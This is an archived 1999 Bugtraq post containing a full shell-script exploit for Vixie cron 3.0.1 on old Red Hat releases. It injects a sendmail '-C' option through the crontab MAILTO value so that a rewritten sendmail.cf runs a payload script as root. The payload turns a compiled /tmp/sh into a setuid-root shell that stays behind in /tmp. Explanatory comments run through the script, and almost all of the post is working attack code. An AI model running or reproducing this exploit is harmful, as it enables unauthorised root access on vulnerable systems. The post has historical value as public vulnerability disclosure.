

Vixie Crontab exploit code

daemon@ATHENA.MIT.EDU (Taeho Oh)
Fri Sep 3 18:24:58 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <19990902004829.A2579@ohhara.postech.ac.kr>
Date:         Thu, 2 Sep 1999 00:48:29 +0900
Reply-To: ohhara@postech.edu
From: Taeho Oh <ohhara@OHHARA.POSTECH.AC.KR>
X-To:         bugtraq@NETSPACE.ORG
To: BUGTRAQ@SECURITYFOCUS.COM

 Vixie Crontab exploit code -- local root on Vixie cron 3.0.1 (tested on Red Hat Linux 4.2 through 6.0). The script installs a crontab whose MAILTO value begins with a sendmail command-line option (-C pointing at an attacker-written sendmail.cf), so that the mail cron sends for the job's output is delivered through an attacker-chosen "local mailer" program; see the script header below.

begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh


# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is for demonstration purposes only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
# PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug


# Pin PATH to the system directories so the tools used below (cc/gcc, sed,
# crontab, date, expr, sleep) resolve to the standard binaries rather than
# to whatever happens to precede them in the caller's PATH.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH


# Print the author banner (blank line, three credit lines, blank line).
printf '\n%s\n%s\n%s\n\n' \
  "Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara" \
  "PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus" \
  "PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug"


# Step 1: build the binary that is meant to end up setuid root.
# Both the source and the binary go to fixed, predictable names in /tmp;
# nothing guards against another local user pre-creating or symlinking
# /tmp/sh or /tmp/sh.c before this script runs.
echo make shell
echo
# Unquoted heredoc, but the C source contains no $ or backticks, so it is
# written verbatim.  NOTE(review): execl() is terminated with a bare 0
# instead of (char *)NULL; that is only reliably correct on the 32-bit
# targets listed in the header, not on LP64 systems.
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
	setuid(0);
	setgid(0);
	execl("/bin/sh","sh",0);
	return 0;
}
EOF
echo compile shell
echo
# Try cc first, fall back to gcc.  If both fail the script still continues,
# and any stale /tmp/sh left over from an earlier run would be used later.
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c


# Step 2: the payload that sendmail will run in place of its local mailer.
# It only achieves anything if sendmail executes it with root privileges:
# it changes the owner/group of /tmp/sh to root and sets the setuid bit,
# leaving a world-executable setuid-root shell.
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
# Must be executable so sendmail can exec it as a mailer program.
chmod 755 /tmp/makesh


# Step 3: derive an attacker-controlled sendmail.cf from the system copy.
# The sed patterns are literal strings expected in the sendmail.cf of the
# Red Hat releases listed in the header (DefaultUser=8:12 and procmail as
# the local mailer).  If the local sendmail.cf differs, sed silently leaves
# the text unchanged and the exploit fails later without any error message.
echo hack sendmail.cf
echo
# Requires /etc/sendmail.cf to be readable by the invoking user.
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
# NOTE(review): this DefaultUser rewrite is written to /tmp/sendmail.cf,
# but that file is overwritten a few lines down by the tmp3 copy, which is
# derived from tmp1 (the unmodified copy).  The DefaultUser=0:0 change
# therefore never reaches the final config; only the two mailer
# substitutions below survive.
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
# Point the local mailer's program path (P=) at the payload script ...
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
# ... and rename the first word of its argument vector (A=) to match.
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
# Final config = tmp1 with only the P= and A= edits applied.
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3


# Step 4: install a crontab whose MAILTO value starts with a sendmail
# option.  The exploit relies on cron passing the MAILTO string through to
# sendmail's command line without validating it, so "-C/tmp/sendmail.cf"
# is parsed by sendmail as "use this alternate configuration file" and the
# user name after it becomes the recipient.  The job itself ("ls") only
# has to produce output every minute so that cron has something to mail.
echo make cron file
echo
# Unquoted heredoc: `whoami` is expanded here, at write time.
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
# Replaces (does not append to) whatever crontab the user already has.
crontab /tmp/cronfile


# Step 5: sleep until a few seconds past the next minute boundary so the
# every-minute job has fired at least once.  65 - <current seconds> yields
# between 6 (at :59) and 65 (at :00) seconds; expr copes with the leading
# zero in values such as "07".
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait


# Step 6: run the binary, which is setuid root only if the mailer
# substitution happened and sendmail ran /tmp/makesh as root.  Otherwise
# this is just an ordinary unprivileged shell.  Either way the cleanup
# below runs once the shell exits.
echo execute shell
echo
/tmp/sh


# Step 7: cleanup.  Note what is NOT removed: /tmp/sh itself, so after a
# successful run a world-executable setuid-root shell stays behind in
# /tmp.  "crontab /dev/null" empties the user's entire crontab, not just
# the injected entry (the user's original crontab was already replaced in
# step 4 and is not restored).
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex

--

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
